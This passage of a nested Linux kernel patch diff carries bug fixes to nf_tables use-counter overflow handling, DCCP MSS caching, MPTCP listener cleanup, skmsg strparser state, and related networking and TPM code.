+ struct device *cpu_device_create(struct device *parent, void *drvdata,
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index 054d7911bfc9f..c1637515a8a41 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -62,6 +62,7 @@ struct sk_psock_progs {
+ 
+ enum sk_psock_state_bits {
+ 	SK_PSOCK_TX_ENABLED,
++	SK_PSOCK_RX_STRP_ENABLED,
+ };
+ 
+ struct sk_psock_link {
+diff --git a/include/linux/tpm.h b/include/linux/tpm.h
+index 4e22e4f4cec85..df5cd4245f299 100644
+--- a/include/linux/tpm.h
++++ b/include/linux/tpm.h
+@@ -282,6 +282,7 @@ enum tpm_chip_flags {
+ 	TPM_CHIP_FLAG_FIRMWARE_POWER_MANAGED	= BIT(6),
+ 	TPM_CHIP_FLAG_FIRMWARE_UPGRADE		= BIT(7),
+ 	TPM_CHIP_FLAG_SUSPENDED			= BIT(8),
++	TPM_CHIP_FLAG_HWRNG_DISABLED		= BIT(9),
+ };
+ 
+ #define to_tpm_chip(d) container_of(d, struct tpm_chip, dev)
+diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h
+index e09ff87146c1c..5976545aa26b9 100644
+--- a/include/net/cfg80211.h
++++ b/include/net/cfg80211.h
+@@ -562,6 +562,9 @@ ieee80211_get_sband_iftype_data(const struct ieee80211_supported_band *sband,
+ 	if (WARN_ON(iftype >= NL80211_IFTYPE_MAX))
+ 		return NULL;
+ 
++	if (iftype == NL80211_IFTYPE_AP_VLAN)
++		iftype = NL80211_IFTYPE_AP;
++
+ 	for (i = 0; i < sband->n_iftype_data; i++)  {
+ 		const struct ieee80211_sband_iftype_data *data =
+ 			&sband->iftype_data[i];
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index f3a37cacb32c3..c752b6f509791 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -1192,6 +1192,29 @@ int __nft_release_basechain(struct nft_ctx *ctx);
+ 
+ unsigned int nft_do_chain(struct nft_pktinfo *pkt, void *priv);
+ 
++static inline bool nft_use_inc(u32 *use)
++{
++	if (*use == UINT_MAX)
++		return false;
++
++	(*use)++;
++
++	return true;
++}
++
++static inline void nft_use_dec(u32 *use)
++{
++	WARN_ON_ONCE((*use)-- == 0);
++}
++
++/* For error and abort path: restore use counter to previous state. */
++static inline void nft_use_inc_restore(u32 *use)
++{
++	WARN_ON_ONCE(!nft_use_inc(use));
++}
++
++#define nft_use_dec_restore	nft_use_dec
++
+ /**
+  *	struct nft_table - nf_tables table
+  *
+@@ -1275,8 +1298,8 @@ struct nft_object {
+ 	struct list_head		list;
+ 	struct rhlist_head		rhlhead;
+ 	struct nft_object_hash_key	key;
+-	u32				genmask:2,
+-					use:30;
++	u32				genmask:2;
++	u32				use;
+ 	u64				handle;
+ 	u16				udlen;
+ 	u8				*udata;
+@@ -1378,8 +1401,8 @@ struct nft_flowtable {
+ 	char				*name;
+ 	int				hooknum;
+ 	int				ops_len;
+-	u32				genmask:2,
+-					use:30;
++	u32				genmask:2;
++	u32				use;
+ 	u64				handle;
+ 	/* runtime data below here */
+ 	struct list_head		hook_list ____cacheline_aligned;
+diff --git a/include/trace/events/tcp.h b/include/trace/events/tcp.h
+index 901b440238d5f..0a14c474c6f95 100644
+--- a/include/trace/events/tcp.h
++++ b/include/trace/events/tcp.h
+@@ -381,6 +381,7 @@ TRACE_EVENT(tcp_cong_state_set,
+ 		__field(const void *, skaddr)
+ 		__field(__u16, sport)
+ 		__field(__u16, dport)
++		__field(__u16, family)
+ 		__array(__u8, saddr, 4)
+ 		__array(__u8, daddr, 4)
+ 		__array(__u8, saddr_v6, 16)
+@@ -396,6 +397,7 @@ TRACE_EVENT(tcp_cong_state_set,
+ 
+ 		__entry->sport = ntohs(inet->inet_sport);
+ 		__entry->dport = ntohs(inet->inet_dport);
++		__entry->family = sk->sk_family;
+ 
+ 		p32 = (__be32 *) __entry->saddr;
+ 		*p32 = inet->inet_saddr;
+@@ -409,7 +411,8 @@ TRACE_EVENT(tcp_cong_state_set,
+ 		__entry->cong_state = ca_state;
+ 	),
+ 
+-	TP_printk("sport=%hu dport=%hu saddr=%pI4 daddr=%pI4 saddrv6=%pI6c daddrv6=%pI6c cong_state=%u",
++	TP_printk("family=%s sport=%hu dport=%hu saddr=%pI4 daddr=%pI4 saddrv6=%pI6c daddrv6=%pI6c cong_state=%u",
++		  show_family_name(__entry->family),
+ 		  __entry->sport, __entry->dport,
+ 		  __entry->saddr, __entry->daddr,
+ 		  __entry->saddr_v6, __entry->daddr_v6,
+diff --git a/io_uring/openclose.c b/io_uring/openclose.c
+index 67178e4bb282d..008990e581806 100644
+--- a/io_uring/openclose.c
++++ b/io_uring/openclose.c
+@@ -110,9 +110,11 @@ int io_openat2(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (issue_flags & IO_URING_F_NONBLOCK) {
+ 		/*
+ 		 * Don't bother trying for O_TRUNC, O_CREAT, or O_TMPFILE open,
+-		 * it'll always -EAGAIN
++		 * it'll always -EAGAIN. Note that we test for __O_TMPFILE
++		 * because O_TMPFILE includes O_DIRECTORY, which isn't a flag
++		 * we need to force async for.
+ 		 */
+-		if (open->how.flags & (O_TRUNC | O_CREAT | O_TMPFILE))
++		if (open->how.flags & (O_TRUNC | O_CREAT | __O_TMPFILE))
+ 			return -EAGAIN;
+ 		op.lookup_flags |= LOOKUP_CACHED;
+ 		op.open_flag |= O_NONBLOCK;
+diff --git a/net/core/filter.c b/net/core/filter.c
+index da71e6812ab51..419ce7c61bd6b 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -4064,12 +4064,6 @@ BPF_CALL_2(bpf_xdp_adjust_tail, struct xdp_buff *, xdp, int, offset)
+ 	if (unlikely(data_end > data_hard_end))
+ 		return -EINVAL;
+ 
+-	/* ALL drivers MUST init xdp->frame_sz, chicken check below */
+-	if (unlikely(xdp->frame_sz > PAGE_SIZE)) {
+-		WARN_ONCE(1, "Too BIG xdp->frame_sz = %d\n", xdp->frame_sz);
+-		return -EINVAL;
+-	}
+-
+ 	if (unlikely(data_end < xdp->data + ETH_HLEN))
+ 		return -EINVAL;
+ 
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 65fb6f5b21b28..296e45b6c3c0d 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -1117,13 +1117,19 @@ static void sk_psock_strp_data_ready(struct sock *sk)
+ 
+ int sk_psock_init_strp(struct sock *sk, struct sk_psock *psock)
+ {
++	int ret;
++
+ 	static const struct strp_callbacks cb = {
+ 		.rcv_msg	= sk_psock_strp_read,
+ 		.read_sock_done	= sk_psock_strp_read_done,
+ 		.parse_msg	= sk_psock_strp_parse,
+ 	};
+ 
+-	return strp_init(&psock->strp, sk, &cb);
++	ret = strp_init(&psock->strp, sk, &cb);
++	if (!ret)
++		sk_psock_set_state(psock, SK_PSOCK_RX_STRP_ENABLED);
++
++	return ret;
+ }
+ 
+ void sk_psock_start_strp(struct sock *sk, struct sk_psock *psock)
+@@ -1151,7 +1157,7 @@ void sk_psock_stop_strp(struct sock *sk, struct sk_psock *psock)
+ static void sk_psock_done_strp(struct sk_psock *psock)
+ {
+ 	/* Parser has been stopped */
+-	if (psock->progs.stream_parser)
++	if (sk_psock_test_state(psock, SK_PSOCK_RX_STRP_ENABLED))
+ 		strp_done(&psock->strp);
+ }
+ #else
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index c84e5073c0b66..96db7409baa12 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -148,13 +148,13 @@ static void sock_map_del_link(struct sock *sk,
+ 	list_for_each_entry_safe(link, tmp, &psock->link, list) {
+ 		if (link->link_raw == link_raw) {
+ 			struct bpf_map *map = link->map;
+-			struct bpf_stab *stab = container_of(map, struct bpf_stab,
+-							     map);
+-			if (psock->saved_data_ready && stab->progs.stream_parser)
++			struct sk_psock_progs *progs = sock_map_progs(map);
++
++			if (psock->saved_data_ready && progs->stream_parser)
+ 				strp_stop = true;
+-			if (psock->saved_data_ready && stab->progs.stream_verdict)
++			if (psock->saved_data_ready && progs->stream_verdict)
+ 				verdict_stop = true;
+-			if (psock->saved_data_ready && stab->progs.skb_verdict)
++			if (psock->saved_data_ready && progs->skb_verdict)
+ 				verdict_stop = true;
+ 			list_del(&link->list);
+ 			sk_psock_free_link(link);
+diff --git a/net/dccp/output.c b/net/dccp/output.c
+index b8a24734385ef..fd2eb148d24de 100644
+--- a/net/dccp/output.c
++++ b/net/dccp/output.c
+@@ -187,7 +187,7 @@ unsigned int dccp_sync_mss(struct sock *sk, u32 pmtu)
+ 
+ 	/* And store cached results */
+ 	icsk->icsk_pmtu_cookie = pmtu;
+-	dp->dccps_mss_cache = cur_mps;
++	WRITE_ONCE(dp->dccps_mss_cache, cur_mps);
+ 
+ 	return cur_mps;
+ }
+diff --git a/net/dccp/proto.c b/net/dccp/proto.c
+index a06b5641287a2..abc02d25edc14 100644
+--- a/net/dccp/proto.c
++++ b/net/dccp/proto.c
+@@ -627,7 +627,7 @@ static int do_dccp_getsockopt(struct sock *sk, int level, int optname,
+ 		return dccp_getsockopt_service(sk, len,
+ 					       (__be32 __user *)optval, optlen);
+ 	case DCCP_SOCKOPT_GET_CUR_MPS:
+-		val = dp->dccps_mss_cache;
++		val = READ_ONCE(dp->dccps_mss_cache);
+ 		break;
+ 	case DCCP_SOCKOPT_AVAILABLE_CCIDS:
+ 		return ccid_getsockopt_builtin_ccids(sk, len, optval, optlen);
+@@ -736,7 +736,7 @@ int dccp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 	trace_dccp_probe(sk, len);
+ 
+-	if (len > dp->dccps_mss_cache)
++	if (len > READ_ONCE(dp->dccps_mss_cache))
+ 		return -EMSGSIZE;
+ 
+ 	lock_sock(sk);
+@@ -769,6 +769,12 @@ int dccp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		goto out_discard;
+ 	}
+ 
++	/* We need to check dccps_mss_cache after socket is locked. */
++	if (len > dp->dccps_mss_cache) {
++		rc = -EMSGSIZE;
++		goto out_discard;
++	}
++
+ 	skb_reserve(skb, sk->sk_prot->max_header);
+ 	rc = memcpy_from_msg(skb_put(skb, len), msg, len);
+ 	if (rc != 0)
+diff --git a/net/ipv4/ip_tunnel_core.c b/net/ipv4/ip_tunnel_core.c
+index 92c02c886fe73..586b1b3e35b80 100644
+--- a/net/ipv4/ip_tunnel_core.c
++++ b/net/ipv4/ip_tunnel_core.c
+@@ -224,7 +224,7 @@ static int iptunnel_pmtud_build_icmp(struct sk_buff *skb, int mtu)
+ 		.un.frag.__unused	= 0,
+ 		.un.frag.mtu		= htons(mtu),
+ 	};
+-	icmph->checksum = ip_compute_csum(icmph, len);
++	icmph->checksum = csum_fold(skb_checksum(skb, 0, len, 0));
+ 	skb_reset_transport_header(skb);
+ 
+ 	niph = skb_push(skb, sizeof(*niph));
+diff --git a/net/ipv4/nexthop.c b/net/ipv4/nexthop.c
+index d8ef05347fd98..9cc2879024541 100644
+--- a/net/ipv4/nexthop.c
++++ b/net/ipv4/nexthop.c
+@@ -3221,13 +3221,9 @@ static int rtm_dump_nexthop(struct sk_buff *skb, struct netlink_callback *cb)
+ 				     &rtm_dump_nexthop_cb, &filter);
+ 	if (err < 0) {
+ 		if (likely(skb->len))
+-			goto out;
+-		goto out_err;
++			err = skb->len;
+ 	}
+ 
+-out:
+-	err = skb->len;
+-out_err:
+ 	cb->seq = net->nexthop.seq;
+ 	nl_dump_check_consistent(cb, nlmsg_hdr(skb));
+ 	return err;
+@@ -3367,25 +3363,19 @@ static int rtm_dump_nexthop_bucket_nh(struct sk_buff *skb,
+ 		    dd->filter.res_bucket_nh_id != nhge->nh->id)
+ 			continue;
+ 
++		dd->ctx->bucket_index = bucket_index;
+ 		err = nh_fill_res_bucket(skb, nh, bucket, bucket_index,
+ 					 RTM_NEWNEXTHOPBUCKET, portid,
+ 					 cb->nlh->nlmsg_seq, NLM_F_MULTI,
+ 					 cb->extack);
+-		if (err < 0) {
+-			if (likely(skb->len))
+-				goto out;
+-			goto out_err;
+-		}
++		if (err)
++			return err;
+ 	}
+ 
+ 	dd->ctx->done_nh_idx = dd->ctx->nh.idx + 1;
+-	bucket_index = 0;
++	dd->ctx->bucket_index = 0;
+ 
+-out:
+-	err = skb->len;
+-out_err:
+-	dd->ctx->bucket_index = bucket_index;
+-	return err;
++	return 0;
+ }
+ 
+ static int rtm_dump_nexthop_bucket_cb(struct sk_buff *skb,
+@@ -3434,13 +3424,9 @@ static int rtm_dump_nexthop_bucket(struct sk_buff *skb,
+ 
+ 	if (err < 0) {
+ 		if (likely(skb->len))
+-			goto out;
+-		goto out_err;
++			err = skb->len;
+ 	}
+ 
+-out:
+-	err = skb->len;
+-out_err:
+ 	cb->seq = net->nexthop.seq;
+ 	nl_dump_check_consistent(cb, nlmsg_hdr(skb));
+ 	return err;
+diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
+index 3a553494ff164..a4d43eb45a9de 100644
+--- a/net/ipv6/ndisc.c
++++ b/net/ipv6/ndisc.c
+@@ -197,7 +197,8 @@ static struct nd_opt_hdr *ndisc_next_option(struct nd_opt_hdr *cur,
+ static inline int ndisc_is_useropt(const struct net_device *dev,
+ 				   struct nd_opt_hdr *opt)
+ {
+-	return opt->nd_opt_type == ND_OPT_RDNSS ||
++	return opt->nd_opt_type == ND_OPT_PREFIX_INFO ||
++		opt->nd_opt_type == ND_OPT_RDNSS ||
+ 		opt->nd_opt_type == ND_OPT_DNSSL ||
+ 		opt->nd_opt_type == ND_OPT_CAPTIVE_PORTAL ||
+ 		opt->nd_opt_type == ND_OPT_PREF64 ||
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index f6f2e6417dcbe..61fefa1a82db2 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2367,7 +2367,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 
+ 	lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
+ 
+-	if (flags & MPTCP_CF_FASTCLOSE) {
++	if ((flags & MPTCP_CF_FASTCLOSE) && !__mptcp_check_fallback(msk)) {
+ 		/* be sure to force the tcp_disconnect() path,
+ 		 * to generate the egress reset
+ 		 */
+@@ -3370,7 +3370,7 @@ static void mptcp_release_cb(struct sock *sk)
+ 
+ 	if (__test_and_clear_bit(MPTCP_CLEAN_UNA, &msk->cb_flags))
+ 		__mptcp_clean_una_wakeup(sk);
+-	if (unlikely(&msk->cb_flags)) {
++	if (unlikely(msk->cb_flags)) {
+ 		/* be sure to set the current sk state before tacking actions
+ 		 * depending on sk_state, that is processing MPTCP_ERROR_REPORT
+ 		 */
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index fc00dd587a297..d77b25636125b 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -312,7 +312,6 @@ struct mptcp_sock {
+ 
+ 	u32 setsockopt_seq;
+ 	char		ca_name[TCP_CA_NAME_MAX];
+-	struct mptcp_sock	*dl_next;
+ };
+ 
+ #define mptcp_data_lock(sk) spin_lock_bh(&(sk)->sk_lock.slock)
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 047e46dd028dd..52a747a80e88e 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1724,16 +1724,31 @@ static void subflow_state_change(struct sock *sk)
+ void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+ {
+ 	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
+-	struct mptcp_sock *msk, *next, *head = NULL;
+-	struct request_sock *req;
+-	struct sock *sk;
++	struct request_sock *req, *head, *tail;
++	struct mptcp_subflow_context *subflow;
++	struct sock *sk, *ssk;
+ 
+-	/* build a list of all unaccepted mptcp sockets */
++	/* Due to lock dependencies no relevant lock can be acquired under rskq_lock.
++	 * Splice the req list, so that accept() can not reach the pending ssk after
++	 * the listener socket is released below.
++	 */
+ 	spin_lock_bh(&queue->rskq_lock);
+-	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
+-		struct mptcp_subflow_context *subflow;
+-		struct sock *ssk = req->sk;
++	head = queue->rskq_accept_head;
++	tail = queue->rskq_accept_tail;
++	queue->rskq_accept_head = NULL;
++	queue->rskq_accept_tail = NULL;
++	spin_unlock_bh(&queue->rskq_lock);
++
++	if (!head)
++		return;
+ 
++	/* can't acquire the msk socket lock under the subflow one,
++	 * or will cause ABBA deadlock
++	 */
++	release_sock(listener_ssk);
++
++	for (req = head; req; req = req->dl_next) {
++		ssk = req->sk;
+ 		if (!sk_is_mptcp(ssk))
+ 			continue;
+ 
+@@ -1741,32 +1756,10 @@ void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_s
+ 		if (!subflow || !subflow->conn)
+ 			continue;
+ 
+-		/* skip if already in list */
+ 		sk = subflow->conn;
+-		msk = mptcp_sk(sk);
+-		if (msk->dl_next || msk == head)
+-			continue;
+-
+ 		sock_hold(sk);
+-		msk->dl_next = head;
+-		head = msk;
+-	}
+-	spin_unlock_bh(&queue->rskq_lock);
+-	if (!head)
+-		return;
+-
+-	/* can't acquire the msk socket lock under the subflow one,
+-	 * or will cause ABBA deadlock
+-	 */
+-	release_sock(listener_ssk);
+-
+-	for (msk = head; msk; msk = next) {
+-		sk = (struct sock *)msk;
+ 
+ 		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
+-		next = msk->dl_next;
+-		msk->dl_next = NULL;
+-
+ 		__mptcp_unaccepted_force_close(sk);
+ 		release_sock(sk);
+ 
+@@ -1790,6 +1783,13 @@ void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_s
+ 
+ 	/* we are still under the listener msk socket lock */
+ 	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
++
++	/* restore the listener queue, to let the TCP code clean it up */
++	spin_lock_bh(&queue->rskq_lock);
++	WARN_ON_ONCE(queue->rskq_accept_head);
++	queue->rskq_accept_head = head;
++	queue->rskq_accept_tail = tail;
++	spin_unlock_bh(&queue->rskq_lock);
+ }
+ 
+ static int subflow_ulp_init(struct sock *sk)
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index dd57a9ebe113d..f6e6273838859 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -255,8 +255,10 @@ int nf_tables_bind_chain(const struct nft_ctx *ctx, struct nft_chain *chain)
+ 	if (chain->bound)
+ 		return -EBUSY;
+ 
++	if (!nft_use_inc(&chain->use))
++		return -EMFILE;
++
+ 	chain->bound = true;
+-	chain->use++;
+ 	nft_chain_trans_bind(ctx, chain);
+ 
+ 	return 0;
+@@ -439,7 +441,7 @@ static int nft_delchain(struct nft_ctx *ctx)
+ 	if (IS_ERR(trans))
+ 		return PTR_ERR(trans);
+ 
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 	nft_deactivate_next(ctx->net, ctx->chain);
+ 
+ 	return 0;
+@@ -478,7 +480,7 @@ nf_tables_delrule_deactivate(struct nft_ctx *ctx, struct nft_rule *rule)
+ 	/* You cannot delete the same rule twice */
+ 	if (nft_is_active_next(ctx->net, rule)) {
+ 		nft_deactivate_next(ctx->net, rule);
+-		ctx->chain->use--;
++		nft_use_dec(&ctx->chain->use);
+ 		return 0;
+ 	}
+ 	return -ENOENT;
+@@ -645,7 +647,7 @@ static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
+ 		nft_map_deactivate(ctx, set);
+ 
+ 	nft_deactivate_next(ctx->net, set);
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 
+ 	return err;
+ }
+@@ -677,7 +679,7 @@ static int nft_delobj(struct nft_ctx *ctx, struct nft_object *obj)
+ 		return err;
+ 
+ 	nft_deactivate_next(ctx->net, obj);
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 
+ 	return err;
+ }
+@@ -712,7 +714,7 @@ static int nft_delflowtable(struct nft_ctx *ctx,
+ 		return err;
+ 
+ 	nft_deactivate_next(ctx->net, flowtable);
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 
+ 	return err;
+ }
+@@ -2358,9 +2360,6 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 	unsigned int data_size;
+ 	int err;
+ 
+-	if (table->use == UINT_MAX)
+-		return -EOVERFLOW;
+-
+ 	if (nla[NFTA_CHAIN_HOOK]) {
+ 		struct nft_stats __percpu *stats = NULL;
+ 		struct nft_chain_hook hook;
+@@ -2457,6 +2456,11 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 	if (err < 0)
+ 		goto err_destroy_chain;
+ 
++	if (!nft_use_inc(&table->use)) {
++		err = -EMFILE;
++		goto err_use;
++	}
++
+ 	trans = nft_trans_chain_add(ctx, NFT_MSG_NEWCHAIN);
+ 	if (IS_ERR(trans)) {
+ 		err = PTR_ERR(trans);
+@@ -2473,10 +2477,11 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 		goto err_unregister_hook;
+ 	}
+ 
+-	table->use++;
+-
+ 	return 0;
++
+ err_unregister_hook:
++	nft_use_dec_restore(&table->use);
++err_use:
+ 	nf_tables_unregister_hook(net, table, chain);
+ err_destroy_chain:
+ 	nf_tables_chain_destroy(ctx);
+@@ -3663,9 +3668,6 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EINVAL;
+ 		handle = nf_tables_alloc_handle(table);
+ 
+-		if (chain->use == UINT_MAX)
+-			return -EOVERFLOW;
+-
+ 		if (nla[NFTA_RULE_POSITION]) {
+ 			pos_handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_POSITION]));
+ 			old_rule = __nft_rule_lookup(chain, pos_handle);
+@@ -3759,6 +3761,11 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		}
+ 	}
+ 
++	if (!nft_use_inc(&chain->use)) {
++		err = -EMFILE;
++		goto err_release_rule;
++	}
++
+ 	if (info->nlh->nlmsg_flags & NLM_F_REPLACE) {
+ 		err = nft_delrule(&ctx, old_rule);
+ 		if (err < 0)
+@@ -3790,7 +3797,6 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		}
+ 	}
+ 	kvfree(expr_info);
+-	chain->use++;
+ 
+ 	if (flow)
+ 		nft_trans_flow_rule(trans) = flow;
+@@ -3801,6 +3807,7 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 	return 0;
+ 
+ err_destroy_flow_rule:
++	nft_use_dec_restore(&chain->use);
+ 	if (flow)
+ 		nft_flow_rule_destroy(flow);
+ err_release_rule:
+@@ -4818,9 +4825,15 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	alloc_size = sizeof(*set) + size + udlen;
+ 	if (alloc_size < size || alloc_size > INT_MAX)
+ 		return -ENOMEM;
++
++	if (!nft_use_inc(&table->use))
++		return -EMFILE;
++
+ 	set = kvzalloc(alloc_size, GFP_KERNEL_ACCOUNT);
+-	if (!set)
+-		return -ENOMEM;
++	if (!set) {
++		err = -ENOMEM;
++		goto err_alloc;
++	}
+ 
+ 	name = nla_strdup(nla[NFTA_SET_NAME], GFP_KERNEL_ACCOUNT);
+ 	if (!name) {
+@@ -4878,7 +4891,7 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		goto err_set_expr_alloc;
+ 
+ 	list_add_tail_rcu(&set->list, &table->sets);
+-	table->use++;
++
+ 	return 0;
+ 
+ err_set_expr_alloc:
+@@ -4890,6 +4903,9 @@ err_set_init:
+ 	kfree(set->name);
+ err_set_name:
+ 	kvfree(set);
++err_alloc:
++	nft_use_dec_restore(&table->use);
++
+ 	return err;
+ }
+ 
+@@ -5024,9 +5040,6 @@ int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	struct nft_set_binding *i;
+ 	struct nft_set_iter iter;
+ 
+-	if (set->use == UINT_MAX)
+-		return -EOVERFLOW;
+-
+ 	if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
+ 		return -EBUSY;
+ 
+@@ -5054,10 +5067,12 @@ int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			return iter.err;
+ 	}
+ bind:
++	if (!nft_use_inc(&set->use))
++		return -EMFILE;
++
+ 	binding->chain = ctx->chain;
+ 	list_add_tail_rcu(&binding->list, &set->bindings);
+ 	nft_set_trans_bind(ctx, set);
+-	set->use++;
+ 
+ 	return 0;
+ }
+@@ -5131,7 +5146,7 @@ void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
+ 		nft_clear(ctx->net, set);
+ 	}
+ 
+-	set->use++;
++	nft_use_inc_restore(&set->use);
+ }
+ EXPORT_SYMBOL_GPL(nf_tables_activate_set);
+ 
+@@ -5147,7 +5162,7 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 		else
+ 			list_del_rcu(&binding->list);
+ 
+-		set->use--;
++		nft_use_dec(&set->use);
+ 		break;
+ 	case NFT_TRANS_PREPARE:
+ 		if (nft_set_is_anonymous(set)) {
+@@ -5156,7 +5171,7 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 
+ 			nft_deactivate_next(ctx->net, set);
+ 		}
+-		set->use--;
++		nft_use_dec(&set->use);
+ 		return;
+ 	case NFT_TRANS_ABORT:
+ 	case NFT_TRANS_RELEASE:
+@@ -5164,7 +5179,7 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 		    set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
+ 			nft_map_deactivate(ctx, set);
+ 
+-		set->use--;
++		nft_use_dec(&set->use);
+ 		fallthrough;
+ 	default:
+ 		nf_tables_unbind_set(ctx, set, binding,
+@@ -5933,7 +5948,7 @@ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ 		nft_set_elem_expr_destroy(&ctx, nft_set_ext_expr(ext));
+ 
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_OBJREF))
+-		(*nft_set_ext_obj(ext))->use--;
++		nft_use_dec(&(*nft_set_ext_obj(ext))->use);
+ 	kfree(elem);
+ }
+ EXPORT_SYMBOL_GPL(nft_set_elem_destroy);
+@@ -6435,8 +6450,16 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 				     set->objtype, genmask);
+ 		if (IS_ERR(obj)) {
+ 			err = PTR_ERR(obj);
++			obj = NULL;
+ 			goto err_parse_key_end;
+ 		}
++
++		if (!nft_use_inc(&obj->use)) {
++			err = -EMFILE;
++			obj = NULL;
++			goto err_parse_key_end;
++		}
++
+ 		err = nft_set_ext_add(&tmpl, NFT_SET_EXT_OBJREF);
+ 		if (err < 0)
+ 			goto err_parse_key_end;
+@@ -6505,10 +6528,9 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 	if (flags)
+ 		*nft_set_ext_flags(ext) = flags;
+ 
+-	if (obj) {
++	if (obj)
+ 		*nft_set_ext_obj(ext) = obj;
+-		obj->use++;
+-	}
++
+ 	if (ulen > 0) {
+ 		if (nft_set_ext_check(&tmpl, NFT_SET_EXT_USERDATA, ulen) < 0) {
+ 			err = -EINVAL;
+@@ -6573,12 +6595,13 @@ err_element_clash:
+ 	kfree(trans);
+ err_elem_free:
+ 	nf_tables_set_elem_destroy(ctx, set, elem.priv);
+-	if (obj)
+-		obj->use--;
+ err_parse_data:
+ 	if (nla[NFTA_SET_ELEM_DATA] != NULL)
+ 		nft_data_release(&elem.data.val, desc.type);
+ err_parse_key_end:
++	if (obj)
++		nft_use_dec_restore(&obj->use);
++
+ 	nft_data_release(&elem.key_end.val, NFT_DATA_VALUE);
+ err_parse_key:
+ 	nft_data_release(&elem.key.val, NFT_DATA_VALUE);
+@@ -6659,7 +6682,7 @@ void nft_data_hold(const struct nft_data *data, enum nft_data_types type)
+ 		case NFT_JUMP:
+ 		case NFT_GOTO:
+ 			chain = data->verdict.chain;
+-			chain->use++;
++			nft_use_inc_restore(&chain->use);
+ 			break;
+ 		}
+ 	}
+@@ -6674,7 +6697,7 @@ static void nft_setelem_data_activate(const struct net *net,
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
+ 		nft_data_hold(nft_set_ext_data(ext), set->dtype);
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_OBJREF))
+-		(*nft_set_ext_obj(ext))->use++;
++		nft_use_inc_restore(&(*nft_set_ext_obj(ext))->use);
+ }
+ 
+ static void nft_setelem_data_deactivate(const struct net *net,
+@@ -6686,7 +6709,7 @@ static void nft_setelem_data_deactivate(const struct net *net,
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
+ 		nft_data_release(nft_set_ext_data(ext), set->dtype);
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_OBJREF))
+-		(*nft_set_ext_obj(ext))->use--;
++		nft_use_dec(&(*nft_set_ext_obj(ext))->use);
+ }
+ 
+ static int nft_del_setelem(struct nft_ctx *ctx, struct nft_set *set,
+@@ -7225,9 +7248,14 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
